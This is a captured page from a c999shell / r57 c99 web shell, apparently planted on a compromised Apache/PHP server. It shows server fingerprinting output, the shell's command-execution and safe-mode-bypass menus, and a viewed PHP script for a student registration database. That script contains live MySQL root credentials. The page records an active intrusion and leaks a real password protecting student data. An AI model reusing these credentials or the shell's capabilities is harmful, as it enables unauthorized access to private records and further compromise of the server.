Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/ws_standard_on_reg/ drwxr-xr-x |
Viewing file: Select action/file-type: <? $information = '<?xml version="1.0" encoding="windows-874"?>'; //Standard 5-6 $information .= "\n<Standard_5_6>"; //num_student $host="localhost"; $username="root"; $pass_word="forever"; $db="reg"; //mysql_query("SET NAMES TIS620"); mysql_connect( $host,$username,$pass_word) or die ("ติดต่อกับฐานข้อมูล Mysql ไม่ได้ "); mysql_select_db($db) or die("เลือกฐานข้อมูลไม่ได้"); $sql = "SELECT * FROM studentmaster "; $dbquery = mysql_query($sql); $num_student_all =mysql_num_rows($dbquery) ; //echo "นักศึกษาทั้งหมด $num_student_all<br>"; $sql2 = "SELECT * FROM studentmaster WHERE studentStatus = '1'"; $dbquery2 = mysql_query($sql2); $num_student_now =mysql_num_rows($dbquery2) ; //echo "นักศึกษาที่กำลังศึกษาอยู่ $num_student<br>"; $sql2 = "SELECT * FROM studentmaster WHERE studentStatus = '5'"; $dbquery2 = mysql_query($sql2); $num_student_out =mysql_num_rows($dbquery2) ; //echo "นักศึกษาที่่ลาออก $num_student_out<br>"; $information .= "\n<num_student_all>"; $information .= "$num_student_all"; $information .= "\n</num_student_all>"; $information .= "\n<num_student_now>"; $information .= "$num_student_now"; $information .= "\n</num_student_now>"; $information .= "\n<num_student_out>"; $information .= "$num_student_out"; $information .= "\n</num_student_out>"; $information .= "\n</Standard_5_6>"; echo "$information"; ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |